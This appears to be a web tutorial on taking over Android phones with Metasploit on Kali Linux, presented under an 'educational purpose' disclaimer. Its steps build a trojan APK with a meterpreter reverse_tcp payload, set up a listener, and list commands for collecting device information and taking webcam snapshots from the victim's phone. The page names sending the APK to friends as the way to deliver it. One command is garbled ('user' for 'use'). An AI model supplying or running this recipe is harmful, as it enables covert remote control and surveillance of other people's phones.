Home » Phone Hacking » Android Smartphone Hacking using Metasploit Linux Kali

Android Smartphone Hacking using Metasploit Linux Kali

The use of Android Smartphone is increasing day by day and along with that security threat is also growing. In this How to Tutorial, I will explain How to Hack Android Smartphone using Metasploit.

Note: The Tutorial is only for Educational purpose so that you can take the required step to protect yourself from Hacking Attack and to secure yourself you also have to think like a hacker. Don’t use the steps mentioned below for illegal purpose. You will be responsible if something wrong happens.

Android is a Linux based operating System and is designed for Tablets and Smartphones. It uses APK File format to install & distribute software applications.

How to Hack Android Using Metasploit Linux Kali

Now I will show you what hackers do to hack your Android operating system. Firstly hackers create an APK file containing Trojan and then sends that file to some of their friends whose system they want to hack. Installing the Application on his Android smartphone gives the control of Android to Hackers.

So don’t ever install any application without verification as it may harm you a lot.

See How Hackers Hack Android Phone

Hackers mostly use Linux Kali operating system to gain access of Android phone. They follow the steps mentioned below to hack your Android Smartphone.

Step 1: Firstly they open the terminal of Linux Kali and then makes a Trojan APK file.

Step 2: They creates the APK file by using the msfpayload command

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 R > /root/Attacker.apk (replace 192.168.*.* with your own IP)

Step 3: They set the payload as reverse_tcp where the hacker expect that the victim will connect back to the hackers machine. As the victim is creating connection with hackers machine so they set up handler to handle the connection requests to the port that they have specified.

Step 4: This will create an APK file of the name Attacker.apk.

Step 5: After that they opens another terminal and creates a listener by using the commands given below:

user exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.*.* (enter your Kali IP address)

set lport 4444

Step 6: After that they type exploit

Now as the victim install that APK file on his Android he will get an option of ReverseTcp and as victim press it, your phone will create a reverse remote shell session with Metasploit.

And that's all they have hacked your Android phone so I am saying it again don’t install any APK file on your device unless it is from the trusted source.

Step 7: Now they can easily get the information about your device by typing the sysinfo command

Step 8: They can also check the running processes by typing ps command.

Step 9: They can take snapshot from your Android device by typing the command webcam_list followed by webcam_snap.

Step 10: They can get the list of all available commands by using the help command.

Conclusion:

In this How to Tutorial, I have explained How Hackers Hack your Android smartphone by using the Metasploit in Linux Kali and how a normal user can prevent himself from these attacks. I hope the tutorial is helpful for you. If you have any question then start the discussion by commenting below. I would love to assist you.

Please enable JavaScript to view the comments powered by Disqus.